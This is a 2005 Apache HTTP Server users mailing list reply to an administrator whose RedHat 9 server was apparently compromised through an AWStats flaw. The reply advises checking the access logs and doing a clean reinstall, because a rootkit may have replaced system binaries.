On 7/14/05, Anderson Miranda <anderson@xxxxxxxxxxxxxxxxxxxx> wrote: > Kk, here is what I've got so far: > > My system seems to be infected by some kind of trojan/worm/virus called > Unix/Hacktop, wich does (for what I'm seeing) some kind of scanport via > ssh (22). > I found some related info saying that the intruder could be using a > security flaw from AWSTATS + Apache to get a valid root bash session > over port 80. > > Now the intruder created a few files, infected some others and is using > this scanport. I stopped the scanport by blocking the output of ssh in > my iptables and could be able to erase some virus related files. > > Now I want to know just 2 things: > > First, how can I be sure that it all happened because of the awstats > security flaw? No way to be 100% certain, but examing your access log for funny calls to your awstats cgi would be a good way to start. > Second, how could I completely remove this Unix/Hacktop from my system > (Linux RedHat9 k2.4) ? Technically, this is impossible without a clean reinstall. The hacker/cracker could have replaced anything and everything. He could have replaced the "rm" binary so that it never deletes files that he placed there. He could have replaced "ls" so it doesn't show those files. He could have replaced iptables so that it allows in his IP no matter what you configure. But since most hackers aren't that smart, you might have some luck if you can figure out what root kit was used and undo the damage. But as you mentioned, this isn't the best list to find help with that. Joshua. --------------------------------------------------------------------- The official User-To-User support forum of the Apache HTTP Server Project. See <URL:http://httpd.apache.org/userslist.html> for more info. To unsubscribe, e-mail: users-unsubscribe@xxxxxxxxxxxxxxxx " from the digest: users-digest-unsubscribe@xxxxxxxxxxxxxxxx For additional commands, e-mail: users-help@xxxxxxxxxxxxxxxx